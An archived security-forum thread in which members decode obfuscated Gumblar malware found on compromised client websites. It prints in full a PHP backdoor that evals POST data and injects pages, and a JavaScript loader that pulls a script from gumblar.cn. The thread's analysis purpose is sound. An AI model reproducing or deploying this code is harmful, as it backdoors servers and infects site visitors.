Zero Identity
Username: Password:
[Forgot Password?] [Not Registered?]

Navigation

Navigation
Challenges
Media
Contribute

ZI Store Updates

Zi Store

Link to UsIf you'd like to become an affilate, please Link to Us!


Online Users

Registered Users: 2016
Latest Registration: yhamrodne
Online Users: 10
(0 Members, 10 Guests)

Poll

What should be done first on the ZI overhaul?
Find more staff (45%) [10 Votes]
Fix all bugs (36%) [8 Votes]
Make new features (not challenges) (9%) [2 Votes]
Get more content (challenges etc) (9%) [2 Votes]

[Poll Archive]

If your shout contains ! in the begining, your links will not be clickable.
If you enter the user's full username, it will be highlighted just for that user.Shoutbox

Kr0wKr0w

Avatar

Last Login:
2012-01-20
Joined:
December 11 2009 01:08
Experience:
2 (16 day(s) ago)
The crashed tables for registration and other stuff is easy to fix (using the Mysql command "REPAIR TABLE").
Kr0wKr0w

Avatar

Last Login:
2012-01-20
Joined:
December 11 2009 01:08
Experience:
2 (17 day(s) ago)
Link Bugs List
ttyler333ttyler333
php coder
Avatar

Last Login:
0000-00-00
Joined:
May 09 2008 01:45
Experience:
1095.2 (18 day(s) ago)
according to a friend the registration doesn't work.
Hunter XHunter X

Avatar

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (18 day(s) ago)
Oh hey, the site's back! :)
hack4uhack4u
ZI Owner
Avatar

Last Login:
0000-00-00
Joined:
March 30 2008 22:30
Experience:
20492 (19 day(s) ago)
Please do keep a list of all the bugs. They might eventually get fixed.. lol.
Hunter XHunter X

Avatar

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (01 month(s) ago)
What we could do is start compling a list of bugs on the Tasks page, so if and when development resumes the developers know what needs doing.
Kr0wKr0w

Avatar

Last Login:
2012-01-20
Joined:
December 11 2009 01:08
Experience:
2 (02 month(s) ago)
Kewl, the domain renewed another year. :) Any other future plans?
Hunter XHunter X

Avatar

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (02 month(s) ago)
Huh, Kr0w's posts disappeared.
Hunter XHunter X

Avatar

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (02 month(s) ago)
I've got no idea. I'll send off an email to one of the admins in a moment to check, since I've been meaning to contact them anyway.
Hunter XHunter X

Avatar

Last Login:
0000-00-00
Joined:
September 25 2010 15:44
Experience:
0 (02 month(s) ago)
There seems to be ~10 guests on most days, but I have no idea if that's genuine users or crawler bots. If they are real users we need to do something to convince them to register.
[Shoutbox Archive]


Icon Zero Identity Forums - General - Security - decode me


Are you bored? Check out the unaswered threads!

swiftnomad
Administrator
Public Relations

Avatar
ZI Guru

Joined: 04/04/2008
Last Seen: 0000-00-00
Experience: 3463.68
Points: 490
#1 decode me on 01/01/1970 00:00
Code Highlighting :: Select Code

function(qLx){var nASYW='%';var jkX=('var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22).3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26(docu.6de.6et.2eco.6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s).21.3dt.79p.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo.77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr.22+b.2b.61+.22Minor.22+b.2b.61.2b.22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src.3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d').replace(qLx,nASYW);eval(unescape(jkX))})(/./g);


Clients websites have a lot of encrypted code and hidden iframes and all of them are reported attack sites. Im trying to figure out what all this encrypted shit is.

Code Highlighting :: Select Code

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihxTHgpe3ZhciBuQVNZVz0nJSc7dmFyIGprWD0oJ3Zhci4yMC42MS4zZC4yMi41My42M3IuNjlwdEVuZ2luZS4yMi4yY2IuM2QuMjJWZXJzaW9uLjI4LjI5Ky4yMi4yY2ouM2QuMjIuMjIuMmN1LjNkLjZlYS43Ni42OWdhLjc0by43Mi4yZXVzLjY1ckFnZS42ZXQuM2JpLjY2KCh1LjJlaW5kZXhPZiguMjJXaW4uMjIpLjNlMCkuMjYuMjYodS4yZS42OW5kLjY1eE8uNjYoLjIyTlQuMjA2LjIyKS4zYzAuMjkuMjYuMjYoZG9jdS42ZGUuNmV0LjJlY28uNmZraWUuMmUuNjluLjY0ZS43OC40ZmYoLjIybWllay4zZDEuMjIpLjNjMCkuMjYuMjYuMjh0eXBlby42Ni4yOHpydi43YS43NHMpLjIxLjNkdC43OXAuNjVvLjY2KC4yMkEuMjIpKS4yOS43Ynpydi43YXRzLjNkLjIyQS4yMi4zYi42NXZhbC4yOC4yMmkuNjYod2luZG8uNzcuMmUuMjIrYSsuMjIpai4zZGorLjIyK2ErLjIyTWEuNmEuNmZyLjIyK2IuMmIuNjErLjIyTWlub3IuMjIrYi4yYi42MS4yYi4yMi40MnVpbGQuMjIrYisuMjJqLjNiLjIyLjI5LjNiZC42ZmN1bWVudC4yZXdyaXRlKC4yMi4zY3NjcmkuNzAuNzQuMjBzcmMuM2QuMmYuMmYuNjd1bWJsYXIuMmUuNjMuNmUuMmZyLjczcy4yZi4zZi42OWQuM2QuMjIraisuMjIuM2UuM2MuNWMuMmYuNzNjcmlwdC4zZS4yMi4yOS4zYi43ZCcpLnJlcGxhY2UocUx4LG5BU1lXKTtldmFsKHVuZXNjYXBlKGprWCkpfSkoLy4vZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("n",$v))>5){$e=preg_match('#['"][^s'".,;?![]:/<>()]{30,}#',$v)||preg_match('#[([](s*d+,){20,}#',$v);if((preg_match('#bevalb#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- ndocument.write(unescape(.+?n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(s*<body)#mi',TMP_XHGFJOKL.'1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


I figured out some of it. the base64 was easy..

Code Highlighting :: Select Code

<script language=javascript><!-- 
(function(qLx){var nASYW='%';var jkX=('var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22).3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26(docu.6de.6et.2eco.6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s).21.3dt.79p.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo.77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr.22+b.2b.61+.22Minor.22+b.2b.61.2b.22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src.3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d').replace(qLx,nASYW);eval(unescape(jkX))})(/./g);
 --></script>


but i dont get it.

Code Highlighting :: Select Code
if (sizeof (problems.txt) > CRITICAL){
    exec("> /dev/null"); }


USER: Hello Tech Support? I can't print...
ME: Try cursive then <hang up>
pyr0t3chnician
Member
Too Legit

Avatar
Professional Analyst

Joined: 01/04/2009
Last Seen: 0000-00-00
Experience: 455.88
Points: 550
#2 Too Legit on 01/01/1970 00:00
The first javascript stuff says this. The funciton takes is variable qlX (which is a period),then it replaces the .'s with % signs in the huge string and creates the script in unescape. Hope that helps somewhat in your decoding.
Code Highlighting :: Select Code

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//gumblar.cn/rss/?id="+j+"></script>");}

unless I am reading this wrong, it makes j = "ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuild+"j;"
I have no idea what the code does besides checking user agent stuff and your cookies for miek=1.

EDIT: found this site, has lots of info on gumblar.cn: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

Sounds like this malicious little bugger moves you over to the gumblar.cn website, forces a PDF file download with an Adobe exploit, then searches for your FTP clients, grabs stored passwords, sends them home, then logs on to those ftp sites, and modifies your files.
Image
tancurrom
Veteran Member
Nibble

Avatar
Advanced Analyst

Joined: 04/03/2008
Last Seen: 2011-05-24
Experience: 532.4
Points: 450
#3 on 01/01/1970 00:00
Yeah you got that somewhat. The string jkX is already escaped and also has the % replaced by periods to obfuscate it more, it holds the script that runs.

The code that is then evaluated only runs if you are using windows (not NT), the cookie miek isn't 1 and zrvzts isn't a string.

The second eval evaluates to this.
Code Highlighting :: Select Code
if(window.ScriptEngine) {
  j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();
}


I think it's basically fetching the local version number of the hack so it can be passed to their servers so they return the right exploit code to run, maybe log it as well.

Ultimately you end up executing this... (were 000 is the version number)
Code Highlighting :: Select Code
<script>zrvzts="A";</script>
<script src=//gumblar.cn/rss/?id=000></script>


Setting the cookie miek=1 will prevent the script running as a quick fix.

@pyr0t3chnician
That link made me chuckle. Facts 2.1 and 2.2 are consistent with most scripts I write, they're kind of invalid points.
A Nibble = 1/2 a Byte

Image
pyr0t3chnician
Member
Too Legit

Avatar
Professional Analyst

Joined: 01/04/2009
Last Seen: 0000-00-00
Experience: 455.88
Points: 550
#4 on 01/01/1970 00:00
So here's a question. Its all over the net that this malicious script is hosted by gumblar.cn, so why don't they get shut down?

My friend owns a hosting/reseller company, and when someone reports something as little as spam from one of his clients servers, he shuts it down until they fix the problem. If someone is intentionally doing this, he straight up deletes their account.

Also on a side note, he was pretty pissed this past weekend. Someone hacked into one of his major servers through SSH and deleted 75 VPS accounts on the partitions, all in about 5 minutes. He had to tell those clients they lost their databases, their backups, and pretty much everything that was stored on their VPS, so they weren't too happy. I told him to quit pissing off hackers and accept their fraudulent credit cards when they try to purchase a dedicated server.
Image


Who is watching forums


Users viewing this page: Guests (1)
Users viewing the forum: 1



© 2009 ZeroIdentity.org

Powered by phpFort © 2008
Page generated in 0.073 seconds. :: MySQL Queries: 12